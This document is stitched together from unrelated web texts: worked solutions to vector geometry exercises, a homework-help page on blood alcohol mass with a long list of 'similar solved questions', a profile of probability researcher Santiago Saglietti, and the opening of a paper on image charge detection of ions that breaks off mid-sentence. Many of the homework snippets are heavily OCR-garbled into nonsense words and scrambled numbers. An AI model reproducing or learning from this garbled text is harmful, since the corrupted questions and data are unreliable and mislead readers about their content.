{-1} \\ 9 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OC}}=\left( {\begin{array}{*{20}{c}} 6 \\ 8 \end{array}} \right),\\\\\therefore \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-1} \\ 9 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-8} \\ {10} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 7 \\ {-1} \end{array}} \right)\\\\\ \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 6 \\ 8 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-1} \\ 9 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 7 \\ {-1} \end{array}} \right)\\\\\therefore \ \ \overrightarrow{{AB}}=\overrightarrow{{BC}}\\\\\ \ \ A,\ B\ \operatorname{and}\ C\ \text{are collinear and }\\\\\ \ \ AB:BC=1:1\ \end{array}$6. If$ \displaystyle \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right)$,$ \displaystyle \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right)$and$ \displaystyle \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right)$, show that$ \displaystyle \Delta PQR$is a right triangle. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right),\\\\\therefore \ \ \overrightarrow{{PQ}}=\overrightarrow{{OQ}}-\overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2} \\ 6 \end{array}} \right)\\\\\therefore \ PQ=\sqrt{{{{{\left( {-2} \right)}}^{2}}+{{6}^{2}}}}=\sqrt{{40}}\\\\\ \ \ \ \overrightarrow{{QR}}=\overrightarrow{{OR}}-\overrightarrow{{OQ}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {14} \\ {-2} \end{array}} \right)\\\\\therefore \ QR=\sqrt{{{{{14}}^{2}}+{{{\left( {-2} \right)}}^{2}}}}=\sqrt{{200}}\\\\\ \overrightarrow{{PR}}=\overrightarrow{{OR}}-\overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {12} \\ 4 \end{array}} \right)\\\\\therefore \ \ PR=\sqrt{{{{{12}}^{2}}+{{4}^{2}}}}=\sqrt{{160}}\\\\\ \ \ \ P{{Q}^{2}}+P{{R}^{2}}=40+160=200\\\\\ \ \ \ Q{{R}^{2}}=200\\\\\therefore \ \ P{{Q}^{2}}+P{{R}^{2}}=\ Q{{R}^{2}}\\\\\therefore \ \ \Delta PQR\ \text{is a right triangle}\text{.}\end{array}$7. If the position vectors of the points$ \displaystyle A, B$and$ \displaystyle C$are$ \displaystyle 9\widehat{\text{i}}+6\widehat{\text{j}}$,$ \displaystyle 4\widehat{\text{i}}+3\widehat{\text{j}}$and$\displaystyle -5\widehat{\text{i}}+8\widehat{\text{j}}$respectively, show that the$ \displaystyle \Delta ABC$is an obtuse triangle. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=9\widehat{\text{i}}+6\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OB}}=4\widehat{\text{i}}+3\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=-5\widehat{\text{i}}+8\widehat{\text{j}}\\\\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =-5\widehat{\text{i}}-3\widehat{\text{j}}\\\\\therefore \ \ \ A{{B}^{2}}={{\left( {-5} \right)}^{2}}+{{\left( {-3} \right)}^{2}}=34\\\\\therefore \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ =-9\widehat{\text{i}}+5\widehat{\text{j}}\\\\\therefore \ \ \ B{{C}^{2}}={{\left( {-9} \right)}^{2}}+{{5}^{2}}=106\\\\\therefore \ \ \ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =-14\widehat{\text{i}}+2\widehat{\text{j}}\\\\\therefore \ \ \ A{{C}^{2}}={{\left( {-14} \right)}^{2}}+{{2}^{2}}=200\\\\\therefore \ \ \ A{{B}^{2}}+B{{C}^{2}}=140\\\\\therefore \ \ \ A{{C}^{2}}>A{{B}^{2}}+B{{C}^{2}}\\\\\therefore \ \ \ \Delta ABC\ \text{is an obtuse triangle}\text{.}\end{array}$8. The position vectors of the points A, B, and C are$ \displaystyle \left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right)$,$ \displaystyle \left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right)$and$ \displaystyle \left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)$respectively. Prove that$ \displaystyle \Delta ABC$is an isosceles right triangle. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \overrightarrow{{OA}}=\left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right),\\\\\ \ \ \overrightarrow{{OB}}=\left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right),\\\\\ \ \ \overrightarrow{{OC}}=\left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)\\\\\ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2} \\ {-6} \end{array}} \right)\\\\\therefore \ \ AB=\sqrt{{{{{\left( {-2} \right)}}^{2}}+{{{\left( {-6} \right)}}^{2}}}}=\sqrt{{40}}\\\\\ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-4} \\ 8 \end{array}} \right)\\\\\therefore \ \ BC=\sqrt{{{{{\left( {-4} \right)}}^{2}}+{{8}^{2}}}}=\sqrt{{80}}\\\\\ \ \ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-6} \\ 2 \end{array}} \right)\\\\\therefore \ \ AC=\sqrt{{{{{\left( {-6} \right)}}^{2}}+{{2}^{2}}}}=\sqrt{{40}}\\\\\therefore \ \ AB=AC\\\\\ \ \ \ A{{B}^{2}}+A{{C}^{2}}=40+40=80=B{{C}^{2}}\\\\\therefore \ \ \ \Delta ABC\ \text{is an isosceles right triangle}\text{.}\end{array}$9.$ \displaystyle OABC$is a parallelogram such that$ \displaystyle \overrightarrow{{OA}}=5\widehat{\text{i}}+3\widehat{\text{j}}$and$ \displaystyle \overrightarrow{{OC}}=-2\widehat{\text{i}}+\widehat{\text{j}}$. Find the unit vector in the direction of$ \displaystyle \ \overrightarrow{{OB}}$and$ \displaystyle \ \overrightarrow{{AC}}$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=5\widehat{\text{i}}+3\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=-2\widehat{\text{i}}+\widehat{\text{j}}\\\\\ \ \ \ \ OABC\ \text{is a parallelogram}.\\\\\therefore \ \ \ \overrightarrow{{OB}}=\overrightarrow{{OA}}+\overrightarrow{{OC}}\ \ \ \left( {\because \text{parallelogram rule}\text{.}} \right)\\\\\ \ \ \ \ \overrightarrow{{OB}}=5\widehat{\text{i}}+3\widehat{\text{j}}-2\widehat{\text{i}}+\widehat{\text{j}}=3\widehat{\text{i}}+4\widehat{\text{j}}\\\\\therefore \ \ \ OB=\sqrt{{{{3}^{2}}+{{4}^{2}}}}=5\\\\\therefore \ \ \ \text{the unit vector in }\\\ \ \ \ \ \text{the direction of}\ \overrightarrow{{OB}}=\displaystyle \frac{{\overrightarrow{{OB}}}}{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{5}\left( {3\widehat{\text{i}}+4\widehat{\text{j}}} \right)\\\\\ \ \ \ \ \ \text{Again}\ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\ \ \\\ \ \ \ \ \overrightarrow{{AC}}=\left( {-2\widehat{\text{i}}+\widehat{\text{j}}} \right)-\left( {5\widehat{\text{i}}+3\widehat{\text{j}}} \right)=-7\widehat{\text{i}}-2\widehat{\text{j}}\\\\\therefore \ \ \ AC=\sqrt{{{{{\left( {-7} \right)}}^{2}}+{{{\left( {-2} \right)}}^{2}}}}=\sqrt{{53}}\\\\\therefore \ \ \ \text{the unit vector in }\\\ \ \ \ \ \text{the direction of}\ \overrightarrow{{AC}}=\displaystyle \frac{{\overrightarrow{{AC}}}}{{AC}}\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{{\sqrt{{53}}}}\left( {-7\widehat{\text{i}}-2\widehat{\text{j}}} \right)\end{array}$10. Given that the position vectors of the points$ \displaystyle A, B$and$ \displaystyle C$relative to origin$ \displaystyle O$are$ \displaystyle -\widehat{\text{i}}+\widehat{\text{j}}$,$ \displaystyle 5\widehat{\text{i}}+\widehat{\text{j}}$and$ \displaystyle p\widehat{\text{i}}+q\widehat{\text{j}}$respectively. If$ \displaystyle \Delta ABC$is equilateral, find the possible values of$ \displaystyle p$and$ \displaystyle q$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=-\widehat{\text{i}}+\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OB}}=5\widehat{\text{i}}+\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=p\widehat{\text{i}}+q\widehat{\text{j}}\\\\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =6\widehat{\text{i}}\\\\\therefore \ \ \ AB=6\\\\\ \ \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {p-5} \right)\widehat{\text{i}}+\left( {q-1} \right)\widehat{\text{j}}\\\\\ \ \ \ \ BC=\sqrt{{{{{\left( {p-5} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}\\\\\ \ \ \ \ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ \ =\left( {p+1} \right)\widehat{\text{i}}+\left( {q-1} \right)\widehat{\text{j}}\\\\\ \ \ \ \ AC=\sqrt{{{{{\left( {p+1} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}\\\\\ \ \ \ \ \text{Since }\Delta ABC\ \text{is equilateral,}\\\\\ \ \ \ \ AB=BC=AC=6.\\\\\therefore \ \ \sqrt{{{{{\left( {p-5} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}=6\\\\\ \ \ \ {{\left( {p-5} \right)}^{2}}+{{\left( {q-1} \right)}^{2}}=36\\\\\ \ \ \ {{p}^{2}}+{{q}^{2}}-10p-2q=10\ ---(1)\\\\\ \ \ \ \text{Similarly,}\\\\\ \ \ \ \sqrt{{{{{\left( {p+1} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}=6\\\\\ \ \ \ {{\left( {p+1} \right)}^{2}}+{{\left( {q-1} \right)}^{2}}=36\\\\\ \ \ \ {{p}^{2}}+{{q}^{2}}+2p-2q=34\ ---(2)\\\\\ \ \ \ \text{By (2)}-\text{(1),}\\\text{ }\\\ \ \ \ 12p=24\\\\\therefore \ \ p=2\\\\\ \ \ \ \text{Substituting}\ p=2\text{ in (1),}\\\text{ }\\\therefore \ \ 4+{{q}^{2}}-20-2q=10\\\ \\\ \ \ \ {{q}^{2}}-2q=26\\\\\ \ \ \ {{q}^{2}}-2q+1=27\\\\\ \ \ \ {{(q-1)}^{2}}=27\\\\\ \ \ \ q-1=\pm \sqrt{{27}}\\\\\ \ \ \ q=1\pm 3\sqrt{3}\end{array}\$
# Blood concentration of 0.065M ethyl alcohol (EtOH) is sufficient to induce a coma: At this concentration, what is the total ###### Question: blood concentration of 0.065M ethyl alcohol (EtOH) is sufficient to induce a coma: At this concentration, what is the total mass of alcohol (in grams) in person whose total blood volume is 7.12L? The molar mass of EtOH is 46.Og/mol: Calculate to one decimal place Read about significant figures and rounding in the Helpful Resources pagel Do not include units when reporting your answer Use standard notation or scientific notation as accepted by blackboard e.g: 0.001 or 1E-3, not 104-3 #### Similar Solved Questions ##### IntheIn-quency dominant allele papulation equmbnuM cotresponding recessive llele thu sum+ poquutior0.35, Ienithu trequcror0.65QUESTION ?Tnty -einbery equatiandocs thi term p2 represenitHomozygous dominant genotyP e Homozygous recessive genotypcHomoracDomaneAaHomozygous recessive [email protected]: [ne estmatco ircquency the dominant aliclc in a populatlon ifthc frequency 0f the hom ozygous reressive scno ypc and 0.250.75QuESTION Whar cstimatcd requcno tnc heterorygotc gcnolype TEeGm 0.367 Show IntheIn-quency dominant allele papulation equmbnuM cotresponding recessive llele thu sum+ poquutior 0.35, Ienithu trequcror 0.65 QUESTION ? Tnty - einbery equatian docs thi term p2 represenit Homozygous dominant genotyP e Homozygous recessive genotypc Homorac DomaneAa Homozygous recessive alicic qu... ##### Given tlat me cointtrom enc unlwo Acoin is randomnly selected from the fIrst box the second box Is gold. comlan: and then 2 3 what Is the probabillyy dropped 1 WOJLU 01 into the second box. first box Then & coin i5 randornly and 2 Cold? 7 silver 1 cui"X04 Given tlat me cointtrom enc unlwo Acoin is randomnly selected from the fIrst box the second box Is gold. comlan: and then 2 3 what Is the probabillyy dropped 1 WOJLU 01 into the second box. first box Then & coin i5 randornly and 2 Cold? 7 silver 1 cui "X04... ##### (2) Is it possible to produce a precipitation hardened 2014 aluminium alloy having a minimum yield... (2) Is it possible to produce a precipitation hardened 2014 aluminium alloy having a minimum yield strength of 350MPa and a ductility of at least 15%EL? If so, specify the precipitation heat treatment. Explain why. (Figure QB2 shows that the precipitation hardening characteristics of a 2014 aluminiu... ##### NEWS WIRE R&D BARRIERS Stifling Would-Be Competition Washington, DC-The Federal Drug Administration (FDA) toda... NEWS WIRE R&D BARRIERS Stifling Would-Be Competition Washington, DC-The Federal Drug Administration (FDA) today "named and shamed" the biggest pharmaceutical companies for stifling the development of generic drugs. Companies wanting to develop generic substitutes for branded drugs must p... ##### ProvideIUPAC rame farthe tolawing molecuez Wrnte tkran € cle_dy next0 EjchTalecule {4pointsDraw thelxnu-Hne mnbun for the follo wire compound; (4 cointstEthul butancate[a4sk +clopenty-trmethulpentaran de Provide IUPAC rame farthe tolawing molecuez Wrnte tkran € cle_dy next0 EjchTalecule {4points Draw thelxnu-Hne mnbun for the follo wire compound; (4 cointst Ethul butancate [a4sk +clopenty-trmethulpentaran de... ##### The graph Px has degree sequence22222.1,17.7.7.7.7.7.7,7None of the other choices6,6.6.6,6.6,62,2.2.2.2.2.1.12,22,22.2.2.26.6.6.6.6.6.6.622,2.222.27.7,7.7,7,7,7 The graph Px has degree sequence 22222.1,1 7.7.7.7.7.7.7,7 None of the other choices 6,6.6.6,6.6,6 2,2.2.2.2.2.1.1 2,22,22.2.2.2 6.6.6.6.6.6.6.6 22,2.222.2 7.7,7.7,7,7,7... ##### Substance He Ne Ar Kr Xe 8. Clz HzO CHa COz CClaa (L2 atm molz) 0.0341 0.211 1.,34 2.32 4.19 0.244 1.39 136 6.49 5.46 2.25 3.59 20.4b (Lmol-l) 0.02370 0.0171 0.0322 0.0398 0.0510 0.0266 0.0391 0.0318 0.0562 0.0305 0.0428 0.0427 0.1383 Substance He Ne Ar Kr Xe 8. Clz HzO CHa COz CCla a (L2 atm molz) 0.0341 0.211 1.,34 2.32 4.19 0.244 1.39 136 6.49 5.46 2.25 3.59 20.4 b (Lmol-l) 0.02370 0.0171 0.0322 0.0398 0.0510 0.0266 0.0391 0.0318 0.0562 0.0305 0.0428 0.0427 0.1383... ##### The $5-\mathrm{kg}$ cylinder is initially at rest when it is placed in contact with the wall $B$ and the rotor at $A$. If the rotor always maintains a constant clockwise angular velocity $\omega=6 \mathrm{rad} / \mathrm{s},$ determine the initial angular acceleration of the cylinder. The coefficient of kinetic friction at the contacting surfaces $B$ and $C$ is $\mu_{k}=0.2$ The $5-\mathrm{kg}$ cylinder is initially at rest when it is placed in contact with the wall $B$ and the rotor at $A$. If the rotor always maintains a constant clockwise angular velocity $\omega=6 \mathrm{rad} / \mathrm{s},$ determine the initial angular acceleration of the cylinder. The coefficient... ##### Arrange the following species in order of increasing nucleophile strength in an S N^ 2 reaction... Arrange the following species in order of increasing nucleophile strength in an S N^ 2 reaction Arrange the following species in order of increasing nucleophile strength in an S2 reaction. H:'-, CH3NH!-, CH3OH a. (Weakest nucleophile) H:1- < CH3NH!- < CH3OH (Strongest Nucleophile) b. ... ##### How to isolate (sputum, blood, fecal matter, etc) Where found -niche (water, air, food, etc) What... How to isolate (sputum, blood, fecal matter, etc) Where found -niche (water, air, food, etc) What media (nutrient, starch, etc) (give specific) Selective growth conditions (aerobic, anaerobic, etc). Identifying traits Give virulent facts (those that help it be pathogenic) Disease it may cause How ea... ##### Point) Find the integral.e4x sin(Tx)dx point) Find the integral. e4x sin(Tx)dx... ##### You own a stock portfolio invested 30 percent in Stock Q, 20 percent in Stock R,... You own a stock portfolio invested 30 percent in Stock Q, 20 percent in Stock R, 15 percent in Stock S, and 35 percent in Stock T. The betas for these four stocks are 1.32, 1.5, 1.05, and 0.75, respectively. What is the portfolio beta? Multiple Choice 1.14 1.06 1.17 1.09 1.12... ##### A runner completes the 200-meters dash with a time of 19.78 seconds. a runner completes the 200-meters dash with a time of 19.78 seconds.... ##### Bond Valuation Exercise (30 points) (a) Compute the price / yield of the following bonds. (b)... Bond Valuation Exercise (30 points) (a) Compute the price / yield of the following bonds. (b) Indicate which bond experiences the biggest price change (in percentage terms) when yields increase by 1%. Bank of Nissan Issuer Bosch America Today Today Today 3.50% | 2.75% Settlement Coupon 0% Frequency ... ##### S/ Fractions-1 Question Help A home decoring company is determining the amount of fate required for... S/ Fractions-1 Question Help A home decoring company is determining the amount of fate required for a customer's window treatments A single window reques and one double Window how much is required? yards and a double window requires 163 yards of fabric there are two single windows... ##### Use the distributive property to remove the parentheses_ 9(Su-3x-2) Use the distributive property to remove the parentheses_ 9(Su-3x-2)... ##### 12. Sketch the graph of y = Ix/ _ 6/x/2 + 12/x/ _ 7/ by using the graph ofy = x 12. Sketch the graph of y = Ix/ _ 6/x/2 + 12/x/ _ 7/ by using the graph ofy = x... ##### Ab Inverse Of the rriatrix 0Select one:1 ab4 ab[w %][a %]27 ab Inverse Of the rriatrix 0 Select one: 1 ab 4 ab [w %] [a %] 27... ##### Let y be & piecewise C1 simple closed curve and 0 is & continuous function on Y Let D be the 'inside" region with boundary with positive orientation. Define a function f:D-C: f(z) = M2ds 2 e D ( -z Show that f is holomorphic on D, Let y be & piecewise C1 simple closed curve and 0 is & continuous function on Y Let D be the 'inside" region with boundary with positive orientation. Define a function f:D-C: f(z) = M2ds 2 e D ( -z Show that f is holomorphic on D,... ##### This Question: 3 pts 31 of 42 (17 complete) Use the simplex method to solve the... This Question: 3 pts 31 of 42 (17 complete) Use the simplex method to solve the following linear programming problem. Find y, 20 and Y220 such that 5y y 28,71 + 5y 28, and w = 4y + 24yis minimized. The minimum is we -aty, -and y2-0 (Simplify your answers.)... ##### [The following information applies to the questions displayed below.] Antuan Company set the following standard costs... [The following information applies to the questions displayed below.] Antuan Company set the following standard costs for one unit of its product. Direct materials (4.0 Ibs. @ $5.00 per Ib.)$ 20.00 Direct labor (1.9 hrs. @ $11.00 per hr.) 20.90 Overhead (1.9 hrs. @$18.50 per hr.) 35... ##### Find r'(t)r(t) = 4Vti + +2V/tj + In( t2)kr(t) Find r'(t) r(t) = 4Vti + +2V/tj + In( t2)k r(t)... ##### The coefficient of determination: Choose one • 10 points A. Represents the percentage of the data... The coefficient of determination: Choose one • 10 points A. Represents the percentage of the data that can be explained by the correlation B. Is equal to the ratio of the explained variation to the total variation C. Is calculated by squaring the correlation coefficient. D. All of the above... ##### Ofte students who finth staiisiks course Get a A rndom sample 0/ 100 sudenis Wes Ikel sudent belleves that no moro than 307 (e 303 received 4s, Slale the null ond. atterratlve hyporheses. Using tha crlucal value approach; test d1 Thln-our percent of tha students In the sampi SA Javel of signlficance: Whlch of tho following th bosi concluslon f0 Oraw from ints t2sn7 typotheses at t4eMulbal CholceSinco Rhe @kuliled hypolheralolle 7at Dubla tha Crilkal valto: 4196 atthe a-0.0S wvelol jnlkcancoCc ofte students who finth staiisiks course Get a A rndom sample 0/ 100 sudenis Wes Ikel sudent belleves that no moro than 307 (e 303 received 4s, Slale the null ond. atterratlve hyporheses. Using tha crlucal value approach; test d1 Thln-our percent of tha students In the sampi SA Javel of signlfica... ##### How do you graph f(x) = (x-2)^2 - 1 on a coordinate graph? How do you graph f(x) = (x-2)^2 - 1 on a coordinate graph?... ##### QuESTiOnWnai Is the minimum thilckness of an oil slick on wator g0 Inat & Iight TBy ol wavele"qin 527 nm norral ing 0f Indux nurcllon ott O 4B and Ihe indax = rolrction ol waleundergp destnuctive Interlerurce (The QuESTiOn Wnai Is the minimum thilckness of an oil slick on wator g0 Inat & Iight TBy ol wavele"qin 527 nm norral ing 0f Indux nurcllon ott O 4B and Ihe indax = rolrction ol wale undergp destnuctive Interlerurce (The... ##### Solve the given initial value problem by undetermined coefficients (annihilator approach). el cos(3x) y(3) +9y' y(0)... Solve the given initial value problem by undetermined coefficients (annihilator approach). el cos(3x) y(3) +9y' y(0) y'(0) = 2 - y"(0) = 1... ##### Units uts. Determine the angle, as measured onthe cross-section tornthe posbe Units uts. Determine the angle, as measured onthe cross-section tornthe posbe... ##### I’m not sure if this is the correct answer Enter your answer in the box provided.... I’m not sure if this is the correct answer Enter your answer in the box provided. The la] of pure quinine, an anti alarial drug, is-165. If a solution contains 77% quinine and 23% of its enantiomer, what is the ee of the solution? HO CH3O quinine (antimalarial drug) 89.1% ee... ##### What constant acceleration is needed to accelerate a baseball from 6 feet sec to 116 feet sec in 2 seconds?27.5 feet / 'Sec2 29 feet Isec2 58 feet /sec? 55 feet /sec? What constant acceleration is needed to accelerate a baseball from 6 feet sec to 116 feet sec in 2 seconds? 27.5 feet / 'Sec2 29 feet Isec2 58 feet /sec? 55 feet /sec?... ##### Write the domain and range of each relation, then indicate whether the relation defines a function. $\{(10,-10),(5,-5),(0,0),(5,5),(10,10)\}$ Write the domain and range of each relation, then indicate whether the relation defines a function. $\{(10,-10),(5,-5),(0,0),(5,5),(10,10)\}$... ##### (2) (12 pts). Show that if f(x) is integrable on [a, b], then 2f(x) + 3... (2) (12 pts). Show that if f(x) is integrable on [a, b], then 2f(x) + 3 is also integrable on [a, b].... ##### 4. An experiment has a data set that fits the function T = a x2 +... 4. An experiment has a data set that fits the function T = a x2 + b where T is the temperature, t is time in seconds and a is a constant to be determined. Using the least square method, derive an expression for 'a' and 'b' that minimizes the error for the data set. Hint: Start with S...
# Dr. Santiago Saglietti ## Overview Santiago obtained his PhD in Probability from the University of Buenos Aires in 2014, under the supervisition of advisors Pablo Groisman and Pablo Ferrari. Afterwards, he continued his research as a postdoc in Universidad de Buenos Aires (2015, Argentina) and Pontificia Universidad Católica (2016, Chile). He currently holds a postdoc fellowship at Technion University, under supervision of Professor Dmitry Ioffe. Santiago has also worked as an Assistant Professor in Universidad Torcuato Di Tella (2015, Buenos Aires) and as a Teaching Instructor in Universidad de Buenos Aires (2008-2014, Buenos Aires). Santiago and his co-workers focus on four separate lines of research. A first line of research is centered on statistical mechanics and, more precisely, on perfect simulation algorithms for extremal Gibbs measures of interacting particle systems. Santiago's work in this topic consisted in realizing these extremal Gibbs measures as invariant distributions of some explicit Markovian dynamics in finding perfect simulation algorithms to sample these invariant distributions exactly. As a consequence of this algorithms, one obtains a powerful simulation tool which can also be exploited from the theoretical point of view as a means of studying Gibbs measures via methods from the theory of stochastic processes. Recently, Santiago has also started doing in research on Random Walks in Random Environments, which is also a popular model with ties to statistical mechanics. A second line of research is the study of metastability phenomena in stochastic partial differential equations. Namely, if one starts with the solution of a (deterministic) PDE which converges to some equilibrium state as time tends to infinity, it is a relevant problem to understand how this convergence is modified upon the addition of a small random noise. Under some particular assumptions on the unperturbed system, it can be shown that the perturbed system behaves in a metastable way: it spends a long time near this equilibrium and then makes an abrupt transition towards another a different state. Santiago focused on studying metastability in this context for the particular case of PDE's with blow-up, in which many technical problems arise and the standard theory to address this questions cannot be used directly. A third line of research is centered on the study of branching Markovian dynamics. More precisely, Santiago has worked on establishing laws of large numbers for the empirical measures of supercritical branching processes in which particles not only branch (at a supercritical rate), but also evolve according to some prescribed Markovian motion. The fourth and final line of research is the study of random (homogeneous) fractal measures. Santiago has focused on understanding the macroscopic geometric properties of these random measures, like dimension and/or regularity, since they are helpful to understand better the structure of non-homogeneous (but deterministic) fractal measures, which are central objects in geometric measure theory. ## Selected Publications Groisman, Pablo; Saglietti, Santiago. Small random perturbations of a dynamical system with blow-up. J. Math. Anal. Appl. 385 (2012), no. 1, 150-166. Galicer, Daniel; Saglietti, Santiago; Shmerkin, Pablo; Yavícoli, Alexia. $\dpi{300}\inline L^q$dimensions and projections of random measures. Nonlinearity 29 (2016) 2609-2640. Fernández, Roberto; Groisman, Pablo; Saglietti, Santiago. Stability of gas measures under perturbations and discretizations. Rev. Math. Phys.  28 (2016), no. 10, 1650022, 46 pp. Groisman, Pablo; Saglietti, Santiago; Saintier, Nicolas. Metastability for small random perturbations of a PDE with blow-up. To appear in Stochastic Processes and their Applications. ## Research Metastability, Probabilistic methods in Statistical Mechanics, Branching Processes and Ergodic Geometric Measure Theory. ## Contact Info Room 317 Cooper Building +
Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript. # Detection of small bunches of ions using image charges ## Abstract A concept for detection of charged particles in a single fly-by, e.g. within an ion optical system for deterministic implantation, is presented. It is based on recording the image charge signal of ions moving through a detector, comprising a set of cylindrical electrodes. This work describes theoretical and practical aspects of image charge detection (ICD) and detector design and its application in the context of real time ion detection. It is shown how false positive detections are excluded reliably, although the signal-to-noise ratio is far too low for time-domain analysis. This is achieved by applying a signal threshold detection scheme in the frequency domain, which - complemented by the development of specialised low-noise preamplifier electronics - will be the key to developing single ion image charge detection for deterministic implantation. ## Introduction Ion implantation is widely used for decades, for example in semiconductor technology, and has recently enabled groundbreaking magnetometry and qubit experiments with e.g. NV-centres in diamond1,2,3,4,5 or single phosphorous atom devices in silicon6,7,8,9,10,11. For the fabrication of scalable quantum devices employing single atoms12, but also for semiconductor doping on the smallest scale, controlling the exact number of the implanted ions is decisive for device performance13. Different approaches are pursued to realise counting a small number of single ions during implantation, but so far success is very limited14. The developed techniques can be categorised in pre-detection and post-detection schemes with regard to the implantation event. Whereas in a post-detection scheme, secondary processes initiated by the ion implantation are used for ion detection, a pre-detection scheme is characterized by an ion detection prior implantation. The significant advantage is that detection efficiencies <100% can be allowed by simply discarding all undetected ions from implantation. The most prominent pre-detection approach is to store a single cooled ion in a Paul trap and accelerate it towards the sample, after its presence in the trap has been detected optically15,16. The main drawbacks, however, are the significant experimental effort and slow implantation rate. For post-detection, either secondary electrons13,17 or the induced charge of the impacting ion 